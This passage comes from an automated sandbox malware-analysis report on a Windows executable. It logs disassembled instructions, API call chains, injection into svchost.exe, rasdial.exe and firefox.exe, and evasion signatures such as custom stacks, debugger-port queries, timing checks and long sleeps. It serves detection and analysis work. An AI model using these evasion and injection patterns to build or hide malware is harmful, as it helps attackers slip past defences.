            Source: Binary string: wntdll.pdb source: 220204-TF1--00.exe, 00000000.00000003.1672930052.0000000003730000.00000004.00001000.00020000.00000000.sdmp, 220204-TF1--00.exe, 00000000.00000003.1673498138.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032818323.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1933247119.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032818323.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1935399769.0000000003300000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4130949319.0000000004EF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2032919172.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4130949319.000000000508E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2035166513.0000000004D4A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000001.00000002.2032674414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2001240762.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, sXIYDUFnJY.exe, 00000005.00000002.4129769188.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4131381557.000000000551C000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000000.2099009703.000000000278C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000313EC000.00000004.80000000.00040000.00000000.sdmp
            Source: 220204-TF1--00.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 220204-TF1--00.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 220204-TF1--00.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 220204-TF1--00.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 220204-TF1--00.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006FC304 LoadLibraryA,GetProcAddress,0_2_006FC304
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E8719 push FFFFFF8Bh; iretd 0_2_006E871B
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006AE94F push edi; ret 0_2_006AE951
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006AEA68 push esi; ret 0_2_006AEA6A
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A8B85 push ecx; ret 0_2_006A8B98
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006AEC43 push esi; ret 0_2_006AEC45
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006AED2C push edi; ret 0_2_006AED2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414833 push ss; retf 1_2_00414842
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041389F push FFFFFFA4h; ret 1_2_004138AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412100 push edi; iretd 1_2_00412101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403110 push eax; ret 1_2_00403112
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A987 push ebp; ret 1_2_0040A99B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417CE3 push eax; ret 1_2_00417CE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413FF7 push ss; retf 1_2_0041403C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417FAD push esp; iretd 1_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350225F pushad ; ret 1_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035027FA pushad ; ret 1_2_035027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035309AD push ecx; mov dword ptr [esp], ecx1_2_035309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350283D push eax; iretd 1_2_03502858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350135E push eax; iretd 1_2_03501369
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030B2B04 push FFFFFFA4h; ret 5_2_030B2B12
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030B1365 push edi; iretd 5_2_030B1366
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030A9BF7 push ebp; ret 5_2_030A9C00
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030B7212 push esp; iretd 5_2_030B7218
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030B3A98 push ss; retf 5_2_030B3AA7
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exeCode function: 5_2_030B6F48 push eax; ret 5_2_030B6F49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04EF27FA pushad ; ret 6_2_04EF27F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04EF225F pushad ; ret 6_2_04EF27F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04EF283D push eax; iretd 6_2_04EF2858
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04F209AD push ecx; mov dword ptr [esp], ecx6_2_04F209B6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F1078C push FFFFFFA4h; ret 6_2_02F1079A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F14BD0 push eax; ret 6_2_02F14BD1
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00684A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00684A35
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_007055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007055FD
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006A33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006A33C7
            Source: C:\Users\user\Desktop\220204-TF1--00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\220204-TF1--00.exeAPI/Special instruction interceptor: Address: 3683234
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E rdtsc 1_2_0357096E
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 2748Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 7224Jump to behavior
            Source: C:\Users\user\Desktop\220204-TF1--00.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98233
            Source: C:\Users\user\Desktop\220204-TF1--00.exeAPI coverage: 5.0 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076Thread sleep count: 2748 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076Thread sleep time: -5496000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076Thread sleep count: 7224 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 8076Thread sleep time: -14448000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe TID: 8088Thread sleep time: -42000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_006E4696
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EC93C FindFirstFileW,FindClose,0_2_006EC93C
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006EC9C7
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006EF200
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006EF35D
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006EF65E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006E3A2B
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006E3D4E
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006EBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006EBF27
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02F1C420 FindFirstFileW,FindNextFileW,FindClose,6_2_02F1C420
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00684AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00684AFE
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130231715.00000000007FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003149000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: firefox.exe, 00000009.00000002.2321622464.0000021A7143C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
            Source: C:\Users\user\Desktop\220204-TF1--00.exeAPI call chain: ExitProcess graph end nodegraph_0-98051
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357096E rdtsc 1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004174F3 LdrLoadDll,1_2_004174F3
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F41FD BlockInput,0_2_006F41FD
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_00683B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00683B4C
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006B5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_006B5CCC
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006FC304 LoadLibraryA,GetProcAddress,0_2_006FC304
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_03683500 mov eax, dword ptr fs:[00000030h]0_2_03683500
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_036834A0 mov eax, dword ptr fs:[00000030h]0_2_036834A0
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_03681E70 mov eax, dword ptr fs:[00000030h]0_2_03681E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov ecx, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B035C mov eax, dword ptr fs:[00000030h]1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FA352 mov eax, dword ptr fs:[00000030h]1_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D8350 mov ecx, dword ptr fs:[00000030h]1_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h]1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D437C mov eax, dword ptr fs:[00000030h]1_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360634F mov eax, dword ptr fs:[00000030h]1_2_0360634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C310 mov ecx, dword ptr fs:[00000030h]1_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03608324 mov eax, dword ptr fs:[00000030h]1_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03608324 mov ecx, dword ptr fs:[00000030h]1_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03608324 mov eax, dword ptr fs:[00000030h]1_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03608324 mov eax, dword ptr fs:[00000030h]1_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03550310 mov ecx, dword ptr fs:[00000030h]1_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h]1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov ecx, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h]1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h]1_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h]1_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EC3CD mov eax, dword ptr fs:[00000030h]1_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h]1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h]1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B63C0 mov eax, dword ptr fs:[00000030h]1_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h]1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035663FF mov eax, dword ptr fs:[00000030h]1_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h]1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03528397 mov eax, dword ptr fs:[00000030h]1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h]1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355438F mov eax, dword ptr fs:[00000030h]1_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355438F mov eax, dword ptr fs:[00000030h]1_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A250 mov eax, dword ptr fs:[00000030h]1_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03536259 mov eax, dword ptr fs:[00000030h]1_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h]1_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h]1_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B8243 mov eax, dword ptr fs:[00000030h]1_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B8243 mov ecx, dword ptr fs:[00000030h]1_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h]1_2_035E0274
